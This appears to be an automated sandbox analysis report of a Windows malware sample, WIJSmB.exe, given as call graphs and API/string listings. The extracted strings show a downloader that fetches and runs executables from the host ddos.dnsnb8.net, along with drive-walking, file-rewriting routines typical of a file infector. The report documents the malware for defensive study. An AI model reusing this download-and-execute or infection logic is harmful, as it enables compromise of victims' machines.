wsprintfA wsprintfA lstrlen CreateFileA 1074 4a15fb WriteFile CloseHandle 1073->1074 1075 4a1633 1073->1075 1074->1075 1076 4a161d ShellExecuteA 1074->1076 1075->1026 1076->1075 1078 4a19a0 1077->1078 1095 4a1ac7 1077->1095 1079 4a19af CreateFileA 1078->1079 1080 4a1a28 GetFileSize 1079->1080 1081 4a19c4 Sleep 1079->1081 1083 4a1a38 1080->1083 1084 4a1a80 1080->1084 1081->1079 1082 4a19d5 1081->1082 1098 4a185b GetSystemTimeAsFileTime srand rand srand rand 1082->1098 1083->1084 1085 4a1a3d VirtualAlloc 1083->1085 1086 4a1a8d CloseHandle 1084->1086 1087 4a1a96 1084->1087 1085->1084 1089 4a1a53 1085->1089 1086->1087 1090 4a1a9c DeleteFileA 1087->1090 1091 4a1aad 1087->1091 1089->1084 1093 4a1a59 ReadFile 1089->1093 1090->1091 1091->1095 1097 4a1ab8 VirtualFree 1091->1097 1092 4a19da wsprintfA CopyFileA 1092->1080 1096 4a1a0d CreateFileA 1092->1096 1093->1084 1093->1089 1095->1046 1095->1047 1096->1080 1096->1090 1097->1095 1098->1092 1100 4a2c09 WaitForMultipleObjects 1099->1100 1105 4a2bc8 1099->1105 1102 4a2c2a CreateThread 1100->1102 1103 4a2c3c 1100->1103 1101 4a2bfa lstrlen 1101->1100 1101->1105 1102->1103 1110 4a2845 1102->1110 1104 4a2bd2 GetDriveTypeA 1104->1101 1104->1105 1105->1101 1105->1104 1106 4a2be3 CreateThread 1105->1106 1106->1101 1107 4a2b7d 1106->1107 1120 4a29e2 memset wsprintfA 1107->1120 1257 4a274a memset memset SHGetSpecialFolderPathA wsprintfA 1110->1257 1112 4a2878 DeleteFileA 1113 4a289a 1112->1113 1114 4a288c VirtualFree 1112->1114 1116 4a28ab 1113->1116 1117 4a28a4 CloseHandle 1113->1117 1114->1113 1115 4a2692 8 API calls 1118 4a2853 1115->1118 1117->1116 1118->1112 1118->1115 1119 4a239d 186 API calls 1118->1119 1119->1118 1121 4a2a3a memset lstrlen lstrcpyn strrchr 1120->1121 1122 4a2abc memset memset FindFirstFileA 1120->1122 1121->1122 1124 4a2a88 1121->1124 1134 4a28b8 memset wsprintfA 1122->1134 1124->1122 1125 4a2a9a lstrcmpiA 1124->1125 1127 4a2aad lstrlen 1125->1127 1128 4a2b74 1125->1128 1127->1122 1127->1125 1129 4a2b61 FindNextFileA 1130 4a2b6d FindClose 1129->1130 1131 4a2b23 1129->1131 1130->1128 1132 4a2b35 lstrcmpiA 1131->1132 1133 4a28b8 174 API calls 1131->1133 1132->1130 1132->1131 1133->1129 1135 4a2905 1134->1135 1140 4a2951 memset 1134->1140 1136 4a291b memset wsprintfA 1135->1136 1137 4a2956 strrchr 1135->1137 1135->1140 1138 4a29e2 180 API calls 1136->1138 1139 4a2967 lstrcmpiA 1137->1139 1137->1140 1138->1140 1141 4a297a 1139->1141 1142 4a2988 lstrcmpiA 1139->1142 1140->1129 1152 4a1e6e 1141->1152 1142->1140 1144 4a2994 1142->1144 1145 4a29ad strstr 1144->1145 1148 4a29a5 lstrcpy 1144->1148 1146 4a29cb 1145->1146 1147 4a29d3 1145->1147 1195 4a239d strstr 1146->1195 1217 4a2692 1147->1217 1148->1145 1153 4a1e7d 1152->1153 1226 4a1df6 strrchr 1153->1226 1156 4a2332 1160 4a233d UnmapViewOfFile 1156->1160 1161 4a2346 1156->1161 1157 4a1eb0 SetFileAttributesA CreateFileA 1157->1156 1158 4a1edf 1157->1158 1231 4a1915 1158->1231 1160->1161 1163 4a234b CloseHandle 1161->1163 1164 4a2350 1161->1164 1163->1164 1165 4a2391 1164->1165 1166 4a2356 CloseHandle 1164->1166 1165->1140 1166->1165 1167 4a1f2e 1167->1156 1237 4a1c81 1167->1237 1171 4a1f92 1172 4a1c81 2 API calls 1171->1172 1173 4a1f9f 1172->1173 1173->1156 1174 4a1af9 169 API calls 1173->1174 1175 4a2024 1173->1175 1178 4a1fc0 1174->1178 1175->1156 1176 4a1af9 169 API calls 1175->1176 1177 4a207a 1176->1177 1179 4a1af9 169 API calls 1177->1179 1178->1156 1178->1175 1180 4a1af9 169 API calls 1178->1180 1183 4a2090 1179->1183 1181 4a1ffe 1180->1181 1182 4a2013 FlushViewOfFile 1181->1182 1182->1175 1184 4a20bb memset memset 1183->1184 1185 4a20f5 1184->1185 1186 4a1c81 2 API calls 1185->1186 1187 4a21de 1186->1187 1188 4a2226 memcpy UnmapViewOfFile CloseHandle 1187->1188 1242 4a1b8a 1188->1242 1190 4a226e 1250 4a185b GetSystemTimeAsFileTime srand rand srand rand 1190->1250 1192 4a22ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1193 4a1915 3 API calls 1192->1193 1194 4a231f CloseHandle 1193->1194 1194->1156 1196 4a23d8 1195->1196 1197 4a2451 CreateFileA GetFileSize 1195->1197 1196->1197 1202 4a2687 1196->1202 1198 4a2480 1197->1198 1199 4a2675 CloseHandle 1197->1199 1198->1199 1201 4a2499 1198->1201 1200 4a267c RemoveDirectoryA 1199->1200 1200->1202 1203 4a1915 3 API calls 1201->1203 1202->1140 1204 4a24a4 9 API calls 1203->1204 1252 4a189d memset CreateProcessA 1204->1252 1207 4a255c Sleep memset wsprintfA 1208 4a29e2 163 API calls 1207->1208 1209 4a2597 memset wsprintfA Sleep 1208->1209 1210 4a189d 6 API calls 1209->1210 1211 4a25e4 Sleep CreateFileA 1210->1211 1212 4a1915 3 API calls 1211->1212 1213 4a2610 CloseHandle 1212->1213 1213->1200 1214 4a261e 1213->1214 1214->1200 1215 4a2641 SetFilePointer WriteFile 1214->1215 1215->1200 1216 4a2667 SetEndOfFile 1215->1216 1216->1200 1218 4a26b2 WaitForSingleObject 1217->1218 1219 4a26a2 CreateEventA 1217->1219 1220 4a26c1 lstrlen ??2@YAPAXI 1218->1220 1223 4a2708 1218->1223 1219->1218 1221 4a26da lstrcpy 1220->1221 1222 4a2736 SetEvent 1220->1222 1224 4a26f1 1221->1224 1222->1140 1223->1222 1225 4a2718 lstrcpy ??3@YAXPAX 1223->1225 1224->1222 1225->1224 1227 4a1e13 lstrcpy strrchr 1226->1227 1229 4a1e62 1226->1229 1228 4a1e40 lstrcmpiA 1227->1228 1227->1229 1228->1229 1230 4a1e52 lstrlen 1228->1230 1229->1156 1229->1157 1230->1228 1230->1229 1232 4a1928 1231->1232 1235 4a1924 SetFilePointer CreateFileMappingA MapViewOfFile 1231->1235 1233 4a192e memset GetFileTime 1232->1233 1234 4a194f 1232->1234 1233->1235 1234->1235 1236 4a1954 SetFileTime 1234->1236 1235->1156 1235->1167 1236->1235 1238 4a1c9c 1237->1238 1240 4a1c94 1237->1240 1239 4a1cae memset memset 1238->1239 1238->1240 1239->1240 1240->1156 1241 4a185b GetSystemTimeAsFileTime srand rand srand rand 1240->1241 1241->1171 1244 4a1b93 1242->1244 1251 4a185b GetSystemTimeAsFileTime srand rand srand rand 1244->1251 1245 4a1bca srand 1246 4a1bd8 rand 1245->1246 1247 4a1c08 1246->1247 1247->1246 1248 4a1c29 memset memcpy lstrcat 1247->1248 1248->1190 1250->1192 1251->1245 1253 4a190c 1252->1253 1254 4a18e0 CloseHandle WaitForSingleObject 1252->1254 1253->1200 1253->1207 1255 4a18fb GetExitCodeProcess 1254->1255 1256 4a1907 CloseHandle 1254->1256 1255->1256 1256->1253 1266 4a185b GetSystemTimeAsFileTime srand rand srand rand 1257->1266 1259 4a27b5 wsprintfA CopyFileA 1260 4a27de wsprintfA 1259->1260 1261 4a2840 1259->1261 1262 4a1973 17 API calls 1260->1262 1261->1118 1263 4a280f 1262->1263 1264 4a2813 DeleteFileA 1263->1264 1265 4a2820 CreateFileA 1263->1265 1264->1265 1265->1261 1266->1259 1268 4a1200 CloseHandle 1267->1268 1269 4a11c6 AdjustTokenPrivileges 1267->1269 1268->1053 1270 4a11f6 1269->1270 1271 4a11f7 CloseHandle 1269->1271 1270->1271 1271->1268 1273 4a123f GetCurrentProcessId OpenProcess 1272->1273 1274 4a1310 1272->1274 1273->1274 1275 4a1262 1273->1275 1274->1051 1281 4a1319 1274->1281 1276 4a12b0 VirtualAlloc 1275->1276 1277 4a12f1 CloseHandle 1275->1277 1279 4a1296 VirtualFree 1275->1279 1280 4a12b8 1275->1280 1276->1275 1276->1280 1277->1274 1278 4a1302 VirtualFree 1277->1278 1278->1274 1279->1276 1280->1277 1282 4a134a 1281->1282 1283 4a132a GetModuleHandleA GetProcAddress 1281->1283 1284 4a1351 memset 1282->1284 1285 4a1363 1282->1285 1283->1282 1283->1285 1284->1285 1285->1051 1285->1060 1286->1073 1288 4a1196 1287->1288 1289 4a10ba 1287->1289 1289->1288 1305 4a185b GetSystemTimeAsFileTime srand rand srand rand 1289->1305 1291 4a1118 wsprintfA wsprintfA URLDownloadToFileA 1292 4a1168 lstrlen Sleep 1291->1292 1293 4a10dc 1291->1293 1292->1289 1296 4a1000 CreateFileA 1293->1296 1297 4a1092 WinExec lstrlen 1296->1297 1298 4a1025 GetFileSize CreateFileMappingA MapViewOfFile 1296->1298 1297->1288 1297->1289 1299 4a107b 1298->1299 1300 4a1057 1298->1300 1302 4a108d CloseHandle 1299->1302 1303 4a1087 CloseHandle 1299->1303 1301 4a1074 UnmapViewOfFile 1300->1301 1304 4a1061 1300->1304 1301->1299 1302->1297 1303->1302 1304->1301 1305->1291 1333 4a2361 1334 4a236b UnmapViewOfFile 1333->1334 1335 4a2374 1333->1335 1334->1335 1336 4a2379 CloseHandle 1335->1336 1337 4a2382 1335->1337 1336->1337 1338 4a2388 CloseHandle 1337->1338 1339 4a2391 1337->1339 1338->1339 1307 4a6076 1308 4a607b 1307->1308 1313 4a60c7 1307->1313 1310 4a61b2 1308->1310 1311 4a60b0 VirtualAlloc 1308->1311 1308->1313 1309 4a615f VirtualFree 1309->1313 1315 4a6389 VirtualProtect 1310->1315 1320 4a62fb 1310->1320 1311->1313 1312 4a6198 VirtualFree 1312->1310 1313->1309 1313->1312 1314 4a60d5 VirtualAlloc 1313->1314 1314->1313 1318 4a63b7 1315->1318 1316 4a63fc VirtualProtect 1317 4a6418 1316->1317 1318->1316 1319 4a63e7 VirtualProtect 1318->1319 1319->1316 1319->1318

                                                                                                                  Callgraph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  • Opacity -> Relevance
                                                                                                                  • Disassembly available
                                                                                                                  callgraph 0 Function_004A274A 4 Function_004A185B 0->4 20 Function_004A1973 0->20 1 Function_004A66C8 30 Function_004A6B02 1->30 32 Function_004A6D00 1->32 36 Function_004A6A84 1->36 2 Function_004A2C48 2->20 29 Function_004A2B8C 2->29 3 Function_004A2845 3->0 43 Function_004A239D 3->43 45 Function_004A2692 3->45 5 Function_004A6159 5->1 6 Function_004A605E 7 Function_004A235D 8 Function_004A17D0 9 Function_004A1C68 10 Function_004A1E6E 10->4 10->9 13 Function_004A2D60 10->13 17 Function_004A1AF9 10->17 23 Function_004A1DF6 10->23 24 Function_004A1D8A 10->24 25 Function_004A1B8A 10->25 34 Function_004A1C81 10->34 37 Function_004A2D9B 10->37 46 Function_004A1915 10->46 11 Function_004A29E2 50 Function_004A28B8 11->50 12 Function_004A6B63 48 Function_004A67A4 12->48 51 Function_004A69B0 12->51 52 Function_004A6834 12->52 14 Function_004A14E1 14->17 49 Function_004A1638 14->49 15 Function_004A2361 15->37 16 Function_004A6CF8 17->49 18 Function_004A2B7D 18->11 19 Function_004A6CF2 19->16 20->4 21 Function_004A2CF0 22 Function_004A6076 22->1 25->4 26 Function_004A600A 27 Function_004A120E 28 Function_004A680F 29->3 29->18 30->12 31 Function_004A1000 31->8 32->12 32->19 32->51 33 Function_004A6001 33->26 35 Function_004A1581 35->4 36->19 36->28 38 Function_004A1718 38->21 39 Function_004A1099 39->4 39->31 40 Function_004A1319 41 Function_004A119F 42 Function_004A139F 42->27 42->40 42->41 43->11 44 Function_004A189D 43->44 43->46 47 Function_004A65A6 49->2 49->8 49->35 49->38 49->39 49->42 50->10 50->11 50->43 50->45 53 Function_004A6734 53->30 53->32 53->36

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 101 4a29e2-4a2a34 memset wsprintfA 102 4a2a3a-4a2a86 memset lstrlen lstrcpyn strrchr 101->102 103 4a2abc-4a2b21 memset * 2 FindFirstFileA call 4a28b8 memset 101->103 102->103 105 4a2a88-4a2a98 102->105 110 4a2b61-4a2b6b FindNextFileA 103->110 105->103 106 4a2a9a-4a2aa7 lstrcmpiA 105->106 108 4a2aad-4a2aba lstrlen 106->108 109 4a2b74-4a2b7a 106->109 108->103 108->106 111 4a2b6d-4a2b6e FindClose 110->111 112 4a2b23-4a2b2a 110->112 111->109 113 4a2b4c-4a2b5c call 4a28b8 112->113 114 4a2b2c-4a2b33 112->114 113->110 114->113 115 4a2b35-4a2b4a lstrcmpiA 114->115 115->111 115->113
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                                                                                                  • String ID: %s*$C:\$Documents and Settings
                                                                                                                  • API String ID: 2826467728-110786608
                                                                                                                  • Opcode ID: 1853bd877efa2eaf43bb67c481b4482e7b5e6e3582a49c8eb446abccb6b4118b
                                                                                                                  • Instruction ID: 7906eeeb4cf55a2c1375bb84ceda86354bdc4915cf471e7eee47de26c25c8dc0
                                                                                                                  • Opcode Fuzzy Hash: 1853bd877efa2eaf43bb67c481b4482e7b5e6e3582a49c8eb446abccb6b4118b
                                                                                                                  • Instruction Fuzzy Hash: DB4195B2804349AFD720DFA4DD49DDBBBACEB96315F04083AF544C3111F678DA4897AA

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 172 4a1099-4a10b4 173 4a10ba-4a10c7 172->173 174 4a1199-4a119c 172->174 175 4a10c8-4a10d4 173->175 176 4a10da 175->176 177 4a1184-4a1190 175->177 179 4a1113-4a1162 call 4a185b wsprintfA * 2 URLDownloadToFileA 176->179 177->175 178 4a1196-4a1198 177->178 178->174 182 4a1168-4a1182 lstrlen Sleep 179->182 183 4a10dc-4a110d call 4a1000 WinExec lstrlen 179->183 182->177 182->179 183->178 183->179
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004A185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75A78400,http://%s:%d/%s/%s,?,?,?,004A1118), ref: 004A1867
                                                                                                                    • Part of subcall function 004A185B: srand.MSVCRT ref: 004A1878
                                                                                                                    • Part of subcall function 004A185B: rand.MSVCRT ref: 004A1880
                                                                                                                    • Part of subcall function 004A185B: srand.MSVCRT ref: 004A1890
                                                                                                                    • Part of subcall function 004A185B: rand.MSVCRT ref: 004A1894
                                                                                                                  • WinExec.KERNEL32(?,00000005), ref: 004A10F1
                                                                                                                  • lstrlen.KERNEL32(004A4748), ref: 004A10FA
                                                                                                                  • wsprintfA.USER32 ref: 004A112A
                                                                                                                  • wsprintfA.USER32 ref: 004A1143
                                                                                                                  • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 004A115B
                                                                                                                  • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 004A1169
                                                                                                                  • Sleep.KERNEL32 ref: 004A1179
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                                                                                                  • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HGJ$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                                                                                  • API String ID: 1280626985-3635962148
                                                                                                                  • Opcode ID: be519edb5e4c852a967a5809a2e1c59d659672675e1fa33a317171d13f14f1cb
                                                                                                                  • Instruction ID: 1ad1fe38c8ba8fddabaef4de61253be3956fc91a7f9a63fe78d1810e6cd5780a
                                                                                                                  • Opcode Fuzzy Hash: be519edb5e4c852a967a5809a2e1c59d659672675e1fa33a317171d13f14f1cb
                                                                                                                  • Instruction Fuzzy Hash: 79218375904248BADB10DBA0DC45BAFBF7CEBA7315F11406AE501A2161D7B85B44CF58

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 216 4a1718-4a1733 GetSystemTimeAsFileTime 217 4a1754-4a1758 216->217 218 4a1735-4a1752 SHSetValueA 216->218 219 4a17c6-4a17cd 217->219 220 4a175a-4a1784 SHGetValueA 217->220 218->219 220->219 221 4a1786-4a17b3 call 4a2cf0 * 2 220->221 221->219 226 4a17b5 221->226 227 4a17bf 226->227 228 4a17b7-4a17bd 226->228 227->219 228->219 228->227
                                                                                                                  APIs
                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\WIJSmB.exe), ref: 004A1729
                                                                                                                  • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 004A174C
                                                                                                                  • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 004A177C
                                                                                                                  • __aulldiv.LIBCMT ref: 004A1796
                                                                                                                  • __aulldiv.LIBCMT ref: 004A17A8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: TimeValue__aulldiv$FileSystem
                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\WIJSmB.exe$SOFTWARE\GTplus$Time
                                                                                                                  • API String ID: 541852442-589047163
                                                                                                                  • Opcode ID: 4fde37b6a12c444bf0fea129d069e79c1f9fabb24c5c5a131ea90934f1fd31a7
                                                                                                                  • Instruction ID: a0e73080e4e38144ee64c4885d92f5aed1094f57f9b0cd091b9acb65ee2dcb93
                                                                                                                  • Opcode Fuzzy Hash: 4fde37b6a12c444bf0fea129d069e79c1f9fabb24c5c5a131ea90934f1fd31a7
                                                                                                                  • Instruction Fuzzy Hash: AC11CB76A00209BBDB109F94CD85FEF7BBCEB17B15F108026F901B6180E6789E44C768

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 229 4a6076-4a6079 230 4a607b-4a6080 229->230 231 4a60e0-4a60eb 229->231 232 4a6082-4a6085 230->232 233 4a60f7-4a60f8 230->233 234 4a60ee-4a60f4 231->234 237 4a60f6 232->237 238 4a6087 232->238 235 4a60fa-4a60fc call 4a66c8 233->235 236 4a60fe-4a6106 233->236 234->237 235->236 240 4a6108-4a611d 236->240 241 4a6155-4a6189 VirtualFree 236->241 237->233 238->234 242 4a6089-4a6095 238->242 243 4a611f-4a6121 240->243 247 4a618c-4a6192 241->247 244 4a60a1-4a60aa 242->244 245 4a6097-4a609f 242->245 248 4a6123 243->248 249 4a6151-4a6154 243->249 250 4a61ba-4a61c8 244->250 251 4a60b0-4a60c1 VirtualAlloc 244->251 245->244 255 4a60c7-4a60cf 247->255 256 4a6198-4a61b0 VirtualFree 247->256 248->249 254 4a6125-4a6128 248->254 249->241 252 4a61ca-4a61d7 250->252 253 4a6243-4a6251 250->253 251->255 257 4a61dd-4a61e0 252->257 262 4a6253 253->262 263 4a6264-4a626f 253->263 258 4a612a-4a612e 254->258 259 4a6134-4a613b 254->259 255->247 260 4a60d5-4a60df VirtualAlloc 255->260 256->250 261 4a61b2-4a61b4 256->261 257->253 265 4a61e2-4a61f2 257->265 258->259 273 4a6130-4a6132 258->273 259->273 274 4a613d-4a614f 259->274 260->231 261->250 264 4a6255-4a6258 262->264 266 4a6271-4a6276 263->266 264->263 269 4a625a-4a6262 264->269 270 4a61f5-4a61fe 265->270 271 4a6389-4a63b1 VirtualProtect 266->271 272 4a627c-4a6289 266->272 269->264 275 4a620c-4a6219 270->275 276 4a6200-4a6203 270->276 277 4a63b7-4a63ba 271->277 288 4a628b 272->288 289 4a6292-4a6298 272->289 273->243 274->243 281 4a6238-4a623f 275->281 278 4a621b-4a6228 276->278 279 4a6205-4a6208 276->279 282 4a63fc-4a6416 VirtualProtect 277->282 283 4a63bc-4a63c2 277->283 278->281 286 4a622a-4a6236 279->286 287 4a620a 279->287 281->270 290 4a6241 281->290 284 4a6418-4a641d 282->284 285 4a6420-4a6425 282->285 283->283 291 4a63c4 283->291 286->281 287->281 288->289 292 4a62a2-4a62ac 289->292 290->257 291->282 293 4a63c6-4a63cf 291->293 294 4a62ae 292->294 295 4a62b1-4a62c8 292->295 296 4a63d1 293->296 297 4a63d4-4a63d8 293->297 294->295 300 4a62ce-4a62d4 295->300 301 4a6373-4a6384 295->301 296->297 298 4a63da 297->298 299 4a63dd-4a63e1 297->299 298->299 302 4a63e3 299->302 303 4a63e7-4a63fa VirtualProtect 299->303 304 4a62da-4a62f1 300->304 305 4a62d6-4a62d9 300->305 301->266 302->303 303->277 303->282 307 4a62f3-4a62f9 304->307 308 4a6365-4a636e 304->308 305->304 309 4a62fb-4a630f 307->309 310 4a6314-4a6326 307->310 308->292 311 4a6426-4a64a9 309->311 312 4a6328-4a634a 310->312 313 4a634c-4a6360 310->313 321 4a64ab-4a64c0 311->321 322 4a6519-4a651c 311->322 312->308 313->311 328 4a64c2 321->328 329 4a6535-4a6537 321->329 323 4a651d-4a651e 322->323 324 4a6583-4a6587 322->324 327 4a6522-4a6533 323->327 326 4a6588-4a658b 324->326 330 4a658d-4a658f 326->330 331 4a65a1-4a65a3 326->331 327->329 334 4a64f8 328->334 335 4a64c5-4a64cd 328->335 332 4a659a 329->332 333 4a6539 329->333 336 4a6591-4a6593 330->336 339 4a659b-4a659d 332->339 337 4a653b-4a6541 333->337 338 4a65b4 333->338 342 4a64fa-4a64fe 334->342 343 4a656c-4a656f 334->343 340 4a64cf-4a64d4 335->340 341 4a6542-4a6545 335->341 336->339 344 4a6595 336->344 337->341 349 4a65be-4a65db 338->349 339->336 345 4a659f 339->345 346 4a64d6-4a64d9 340->346 347 4a6517-4a6518 340->347 348 4a654d-4a6550 341->348 350 4a6572 342->350 351 4a6500 342->351 343->350 344->332 345->326 346->348 354 4a64db-4a64f5 346->354 347->322 348->349 355 4a6552-4a6556 348->355 356 4a65dd-4a65f6 349->356 352 4a6573-4a6576 350->352 351->327 353 4a6502 351->353 358 4a6578-4a657a 352->358 353->352 359 4a6504-4a6513 353->359 354->334 355->358 360 4a6558-4a6569 355->360 357 4a65f7-4a6608 356->357 358->356 361 4a657c 358->361 359->329 362 4a6515 359->362 360->343 361->357 363 4a657e-4a657f 361->363 362->347 363->324
                                                                                                                  APIs
                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 004A60BE
                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 004A60DF
                                                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 004A6189
                                                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 004A61A5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Virtual$AllocFree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2087232378-0
                                                                                                                  • Opcode ID: c160404d0471eeb2df17f32c2cd9998b7eee8f6ed123623815d5d88437764042
                                                                                                                  • Instruction ID: ada0da3777295f4ec179e6c7a12e839c22f8aa7d64ea8bf2e99971e220a85831
                                                                                                                  • Opcode Fuzzy Hash: c160404d0471eeb2df17f32c2cd9998b7eee8f6ed123623815d5d88437764042
                                                                                                                  • Instruction Fuzzy Hash: 811236725087849FDB328F24CC45BEA3FB4EF23310F1E459ED8858B292D678A901C759

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 364 4a2b8c-4a2bc6 memset GetLogicalDriveStringsA 365 4a2bc8-4a2bcc 364->365 366 4a2c09-4a2c28 WaitForMultipleObjects 364->366 367 4a2bfa-4a2c07 lstrlen 365->367 368 4a2bce-4a2bd0 365->368 369 4a2c2a-4a2c3a CreateThread 366->369 370 4a2c3c-4a2c45 366->370 367->365 367->366 368->367 371 4a2bd2-4a2bdc GetDriveTypeA 368->371 369->370 371->367 372 4a2bde-4a2be1 371->372 372->367 373 4a2be3-4a2bf6 CreateThread 372->373 373->367
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004A2BA6
                                                                                                                  • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 004A2BB4
                                                                                                                  • GetDriveTypeA.KERNEL32(?), ref: 004A2BD3
                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,004A2B7D,?,00000000,00000000), ref: 004A2BEE
                                                                                                                  • lstrlen.KERNEL32(?), ref: 004A2BFB
                                                                                                                  • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 004A2C16
                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,004A2845,00000000,00000000,00000000), ref: 004A2C3A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true
                                                                                                                  • Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1073171358-0
                                                                                                                  • Opcode ID: 7b586dcf60d7f0f7d8bfc51faff22b83e1206c3bd2a1aa6f4f26c4153dcd936e
                                                                                                                  • Instruction ID: 0bba3325c0a4be945fd48566344f5f0ca035062d2ee0228432786257947a8ccc
                                                                                                                  • Opcode Fuzzy Hash: 7b586dcf60d7f0f7d8bfc51faff22b83e1206c3bd2a1aa6f4f26c4153dcd936e
                                                                                                                  • Instruction Fuzzy Hash: 082105B180014CAFE7209F689C84EAF7F6CFB56355B10012AF94292151E3A8DD06DB78

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
